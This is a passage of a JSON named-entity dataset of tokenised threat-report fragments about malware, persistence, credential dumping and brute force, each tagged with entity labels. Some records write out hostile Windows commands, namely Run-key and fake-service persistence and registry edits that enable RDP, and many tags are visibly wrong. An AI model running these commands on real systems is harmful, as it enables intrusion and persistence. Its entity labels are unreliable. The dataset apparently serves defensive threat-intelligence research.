], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RC4-decrypts", "command", "data", "returned", "in", "the", "Data", "field." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "dropper", "configures", "the", "backdoor", "with", "a", "C2", "server", "address,", "RC4", "encryption", "key," ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Base64-decodes" ], "ner_tags": [ "O" ] }, { "tokens": [ "decryption." ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "decrypt", "the", "Data", "field." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decrypts", "and", "executes", "in", "memory" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "embedded", "key", "to", "decrypt", "the", "source", "code" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "deobfuscated", "SMOKEDHAM", "dropper." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Upload", "a", "screen", "capture", "to", "its", "C2", "server" ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "backdoor", "writes", "captured", "keystrokes", "to", "memory", "and", "uploads", "them", "to", "its", "C2", "server" ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "reg.exe", "add", "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ], "ner_tags": [ "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "created", "a", "persistence", "mechanism", "for", "NGROK", "by", "adding", "VirtualHost.vbs", "to", "the", "WindNT", "value", "under", "the", "current", "users", "Run", "registry", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "O", "O", "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "created", "a", "persistence", "mechanism", "for", "UltraVNC", "by", "adding", "the", "application", "to", "the", "ConhostNT", "value", "under", "the", "current", "users", "Run", "registry", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "reg.exe", "add", "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ], "ner_tags": [ "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "store", "a", "file", "named", "update.lnk", "in", "the", "%APPDATA%\\Microsoft\\Windows\\Start", "Menu\\Programs\\Startup\\", "directory" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "command", "line", "argument", "provided" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "passed", "as", "an", "argument", "on", "the", "command", "line." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executed", "using", "the", "Command-Line", "Compiler." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "launched", "with", "a", "command", "line" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "Command", "Prompt." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "backdoor", "source", "code", "is", "embedded", "as", "an", "encrypted", "string." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "whoami.exe" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "systeminfo.exe" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "reg.exe", "ADD", "'HKLM\\SOFTWARE\\Microsoft\\Windows", "NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "modifying", "Terminal", "Server", "registry", "key", "values" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "modifying", "the", "Local", "Security", "Authority", "(LSA)", "registry", "key", "value" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "reg.exe", "ADD", "'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal", "Server'", "/v", "fDenyTSConnections", "/t", "REG_DWORD", "/d", "0", "/f" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-Idus", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "reg.exe", "ADD", "'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal", "Server'", "/v", "fSingleSessionPerUser", "/t", "REG_DWORD", "/d", "0", "/f" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-Idus", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "reg.exe", "ADD", "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa", "/v", "LimitBlankPasswordUse", "/t", "REG_DWORD", "/d", "1", "/f" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-Idus", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "modified", "the", "WDigest", "registry", "key", "value", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential", "to", "enable", "credential", "caching." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "to", "enable", "multiple", "Remote", "Desktop", "connection", "sessions" ], "ner_tags": [ "O", "O", "O", "B-Tool", "O", "B-Features", "O" ] }, { "tokens": [ "the", "attacker", "was", "observed", "moving", "laterally", "to", "different", "systems", "in", "the", "environment", "using", "Remote", "Desktop", "Protocol", "(RDP)", "connections." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "B-Way", "O" ] }, { "tokens": [ "attacker", "dump", "the", "LSASS", "process", "using", "Task", "Manager", "to", "a", "file", "named", "lsass.DMP,", "and", "later,", "zip", "the", "dump", "into", "two", "files", "named", "lsass.zip", "and", "lsass2.zip", "located", "in", "the", "C:\\ProgramData\\psh\\", "directory." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LSASS", "Dumping" ], "ner_tags": [ "B-Idus", "B-SecTeam" ] }, { "tokens": [ "conducted", "credential", "harvesting", "via", "dumping", "LSASS", "memory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "activity", "from", "Tor" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "hop", "points", "to", "enable", "their", "cyber", "operations", "while", "remaining", "anonymous." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "“The", "Onion", "Router”", "(Tor)", "is", "often", "used", "by", "cyber", "threat", "actors", "for", "anonymity", "and", "C2." ], "ner_tags": [ "B-Way", "B-Tool", "B-SecTeam", "O", "O", "O", "O", "O", "B-Idus", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "resulted", "in", "confirmed", "compromises", "of", "internet-facing", "Federal", "Government", "agency", "systems." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "O", "O" ] }, { "tokens": [ "resulted", "in", "confirmed", "compromises", "of", "internet-facing", "Federal", "Government", "agency", "systems." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "O", "O" ] }, { "tokens": [ "the", "actors", "leveraging", "CVE-2019-19781", "to", "compromise", "Citrix", "Application", "Delivery", "Controllers." ], "ner_tags": [ "O", "B-HackOrg", "O", "B-Features", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "attack", "of", "a", "Remote", "Desktop", "Protocol", "on", "a", "public-facing", "server." ], "ner_tags": [ "B-OffAct", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "cyber", "threat", "actors", "using", "external", "proxy", "tools" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "These", "proxy", "tools", "may", "be", "commercially", "available", "infrastructure", "as", "a", "service", "(IaaS)", "or", "software", "as", "a", "service", "(SaaS)", "in", "the", "form", "of", "a", "web", "browser", "promising", "anonymity", "on", "the", "internet." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "proxy", "tools", "depending", "on", "their", "intended", "use." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "activity", "from", "a", "network", "proxy", "tool" ], "ner_tags": [ "B-OffAct", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cyber", "threat", "actors", "also", "continue", "to", "identify", "large", "repositories", "of", "credentials", "that", "are", "available", "on", "the", "internet", "to", "enable", "brute-force", "attacks." ], "ner_tags": [ "B-Time", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "brute-force", "passwords." ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "threat", "actors", "using", "Mimikatz", "in", "conjunction", "with", "coin", "miner", "protocols", "and", "software." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "used", "Mimikatz", "to", "dump", "credentials", "from", "the", "OS", "using", "a", "variety", "of", "capabilities", "resident", "within", "the", "tool." ], "ner_tags": [ "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "actors", "using", "Mimikatz", "during", "their", "operations." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "a", "brute-force", "attack", "of", "a", "Remote", "Desktop", "Protocol", "on", "a", "public-facing", "server." ], "ner_tags": [ "O", "B-Org", "B-OffAct", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "such", "as", "a", "keystroke", "logger" ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "file", "injection", "capability" ], "ner_tags": [ "B-Features", "O", "O" ] }, { "tokens": [ "actors", "to", "execute", "directory", "traversal", "attacks" ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "or", "delete", "files" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "allows", "cyber", "threat", "actors", "to", "execute", "arbitrary", "system", "commands," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "concealed", "programs", "and", "documents", "at", "innocuous-seeming", "locations", "on", "victim", "networks", "and", "in", "victim", "networks’", "“recycle", "bins.”" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "lures", "are", "designed", "to", "socially", "engineer", "the", "recipient", "to", "download", "and", "open", "an", "attached", "RAR", "file", "that", "contains", "either", "a", "Microsoft", "Compiled", "HTML", "Help", "(CHM)", "or", "Excel", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "phishing", "emails", "that", "were", "used", "as", "lures", "to", "deliver", "the", "files" ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "download", "further", "malware", "payloads" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "to", "download", "a", "next", "stage", "EXE", "payload", "using", "cURL" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "downloading", "of", "the", "next", "stage." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "One", "scheduled", "task", "(shown", "below)", "runs", "every", "15", "minutes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\System32\\schtasks.exe", "/create", "/sc", "MINUTE", "/mo", "15", "/TN" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "creates", "two", "different", "scheduled", "tasks." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Scheduled", "task" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "second", "scheduled", "task", "created", "attempts", "to", "execute", "the", "payload", "downloaded", "by", "the", "other", "task:", "\"C:\\Windows\\System32\\schtasks.exe\"", "/create", "/sc", "MINUTE", "/mo", "20", "/TN" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-Idus", "B-Idus", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "create", "a", "scheduled", "task" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\System32\\schtasks.exe", "/create", "/sc", "minute", "/mo", "15", "/tn" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "to", "create", "scheduled", "tasks", "for", "persistence" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "schtasks", "/create", "/tn", "WinSecurity", "/sc", "minute", "/mo", "15" ], "ner_tags": [ "B-Way", "B-SamFile", "B-SamFile", "B-Way", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "These", "payloads", "are", "compressed", "inside", "RAR", "files,", "this", "helps", "avoid", "static", "analysis", "techniques" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "more", "common", "payloads", "contained", "within", "the", "RAR", "files", "are", "Microsoft", "Compiled", "HTML", "Help", "(CHM)", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O" ] }, { "tokens": [ "The", "computer", "name" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "computer", "name", "is", "sent", "to", "the", "C2" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "username", "is", "also", "sent", "to", "the", "C2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "computer", "name", "and", "the", "username", "is", "also", "sent", "to", "the", "C2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "computer", "name", "is", "sent", "to", "the", "C2" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "plugins", "such", "as", "a", "keylogger," ], "ner_tags": [ "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "remote", "access", "tool" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "file", "stealer" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "an", "encoded", "PowerShell", "command", "stage,", "obfuscating", "the", "activity", "further", "than", "just", "simple", "string", "concatenation." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Encoded", "PowerShell", "command" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "decoded", "command" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "threat", "actors", "obtain", "initial", "access", "to", "networks", "is", "through", "the", "use", "of", "compromised", "valid", "credential", "pairs" ], "ner_tags": [ "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "often", "will", "search", "for", "directories", "on", "the", "network" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "remote", "desktop", "protocol", "(RDP)", "and", "secure", "shell", "(SSH)", "accesses" ], "ner_tags": [ "B-Tool", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "B-Way", "O" ] }, { "tokens": [ "Threat", "actors", "will", "look", "for", "networks", "that", "have", "internet-facing", "servers", "running", "RDP", "and", "then", "exploit", "vulnerabilities", "in", "those", "servers" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exposed", "RDP", "servers", "are", "also", "abused", "by", "threat", "actors", "to", "gain", "initial", "access", "into", "a", "targets", "network." ], "ner_tags": [ "O", "B-Tool", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "use", "brute", "force", "password", "attacks" ], "ner_tags": [ "O", "B-Way", "I-Way", "I-Way", "O" ] }, { "tokens": [ "The", "server", "contained", "HTTP", "header", "data", "(SimpleHTTP/0.6", "Python/3.8.10),", "indicating", "the", "use", "of", "a", "Python", "library", "called", "SIMPLEHTTPSERVER" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "threat", "actor", "also", "engaged", "in", "brute-forcing", "against", "the", "victim's", "internal", "web", "services" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "brute", "forcing", "tool", "called", "FSCAN." ], "ner_tags": [ "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "brute-force", "attacks", "on", "systems" ], "ner_tags": [ "B-Org", "B-OffAct", "O", "O" ] }, { "tokens": [ "brute", "forcing", "attempts", "on", "some", "of", "the", "internal", "FTP", "servers", "inside", "victim", "network" ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "database", "used", "a", "weak", "password", "and", "was", "susceptible", "to", "brute-force", "attacks." ], "ner_tags": [ "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "threat", "actor", "used", "the", "Windows", "command-line", "arguments" ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "received", "a", "command-line", "argument", "from", "attacker" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Used", "to", "search", "for", "the", "string", "\"DBPath\"", "in", "all", "files", "within", "the", "current", "directory", "and", "its", "subdirectories" ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "B-Features", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "List", "of", "recently", "opened", "files", "and", "folders", "on", "the", "computer." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "uses", "stolen", "passwords", "from", "valid", "accounts" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "escalate", "privileges", "using", "valid", "accounts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "reverse", "SOCKS", "proxy", "activity", "on", "the", "infected", "device", "using", "the", "open-source", "tool", "FRP." ], "ner_tags": [ "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "After", "establishing", "the", "reverse", "SOCKS", "proxy", "connection," ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "The", "threat", "actor", "utilized", "open-source", "reverse", "proxy", "tools", "to", "expose", "local", "devices", "located", "behind", "a", "NAT", "or", "firewall,", "to", "the", "Internet." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Execution", "of", "FRP", "reverse", "SOCKS", "proxy", "on", "infected", "host." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Installation", "of", "malicious", "Windows", "service." ], "ner_tags": [ "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "it", "will", "install", "a", "fake", "Windows", "service", "called", "“windowsupdate”" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Malicious", "service", "installation", "is", "accomplished", "via", "the", "below", "command", "line", "argument:", "sc", "create", "WindowsUpdate", "binPath=", "C:\\Windows\\Temp\\svchost.exe", "start=", "auto", "obj=", "LocalSystem", "DisplayName=", "windowsupdate" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maintain", "Presence", "via", "Windows", "Service", "Installation" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "establish", "persistent", "remote", "access", "on", "the", "victim", "device,", "the", "threat", "actor", "abused", "Windows", "services", "to", "install", "modified", "version", "of", "Cobalt", "Strike", "payload" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "installed", "a", "second", "stage", "persistence", "backdoor", "on", "infected", "device", "by", "abusing", "Windows", "Services." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O" ] }, { "tokens": [ "This", "service", "executes", "a", "malicious", "binary", "(Cobalt", "Strike", "Cat", "payload)", "under", "“C:\\Windows\\Temp\\svchost.exe”", "every", "time", "the", "victim", "device", "is", "started." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Windows", "services", "ran", "with", "the", "highest", "privilege,", "NT", "AUTHORITY\\SYSTEM", "and", "execute", "the", "malware", "automatically", "during", "system", "startup,", "allowing", "for", "remote", "access", "to", "the", "victim", "device", "with", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "used", "private", "proxy", "addresses", "from", "a", "Chinese", "underground", "proxy", "IP", "solution", "called", "'Tigercloud", "Club'", "to", "conceal", "their", "real", "IP", "address." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Reverse", "proxy", "tool" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Reverse", "proxy", "tool" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Threat", "actor", "uploaded", "the", "fast", "reverse", "proxy", "(FRP)", "binary" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "One", "of", "the", "main", "initial", "access", "vector", "is", "exploitation", "of", "publicly", "exposed", "web", "services." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Initial", "Compromise", "Through", "Exploiting", "Publicly", "Facing", "Applications" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "primarily", "focuses", "on", "four", "different", "known", "remote", "code", "execution", "(RCE)", "vulnerabilities", "during", "their", "operations:•", "CVE-2023-21839", "Oracle", "WebLogic", "Server", "RCE", "[13]•", "CVE-2021-3129", "Laravel", "debug", "mode", "RCE", "[14]•", "CVE-2020-2551", "Oracle", "WebLogic", "RCE", "[15]•", "CVE-2021-44228", "Apache", "Log4j", "[16]" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "the", "victim", "IP", "address", "was", "publicly", "serving", "a", "web", "service", "that", "contained", "a", "phpMyAdmin", "database." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "The", "threat", "actor", "primarily", "focused", "on", "exploiting", "four", "different", "remote", "code", "execution", "(RCE)", "vulnerabilities", "to", "target", "web", "services" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decrypting", "and", "exporting", "browser", "data" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "decryption", "key", "for", "the", "ZIP", "folder", "and", "access", "the", "tool" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Tool", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "distributed", "inside", "an", "encrypted", "ZIP", "folder." ], "ner_tags": [ "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "executed", "the", "\"tasklist", "/SVC\"", "command", "to", "list", "all", "running", "processes", "on", "the", "victim", "device." ], "ner_tags": [ "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "deleted", "the", "LaZagne", "binary", "after", "execution", "to", "avoid", "detection", "from", "the", "user's", "side." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actor", "leveraged", "ONE-FOX", "-", "a", "collection", "of", "pentest", "tools", "-", "to", "copy", "binaries", "from", "actor´s", "system", "to", "the", "victim." ], "ner_tags": [ "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Recording", "keystrokes", "in", "real", "time", "with", "offline", "logging", "available" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Downloading", "files", "remotely" ], "ner_tags": [ "B-Features", "I-Features", "O" ] }, { "tokens": [ "the", "dropper", "then", "downloads", "a", "custom", "XMRig", "miner" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "script", "to", "download,", "configure", "and", "execute" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "download", "the", "XMRig", "payload." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "pulls", "the", "XMRig", "payload" ], "ner_tags": [ "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "generating", "a", "script", "to", "decode", "the", "legitimate", "Mach-O", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "is", "decoded", "and", "unarchived" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "This", "value", "is", "decoded" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "Logic", "Pro", "X", "dropper", "binary", "is", "deleted", "with", "the", "/tmp/", "bundle" ], "ner_tags": [ "O", "I-SamFile", "I-SamFile", "B-SecTeam", "B-SecTeam", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "In", "order", "to", "unpack", "the", "legitimate", "binary," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "binary", "unpacks", "a", "customized", "Mach-O" ], "ner_tags": [ "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "previously", "written", "Base64", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Files", "are", "dropped/downloaded", "as", "Base64-encoded", "archives." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "script", "first", "deletes", "itself", "from", "the", "disk." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "removes", "any", "files" ], "ner_tags": [ "B-Features", "O", "O" ] }, { "tokens": [ "deleted", "every", "time" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "script", "then", "removes", "any", "files" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "script", "removes", "the", "i2pd", "Mach-O", "file", "from", "the", 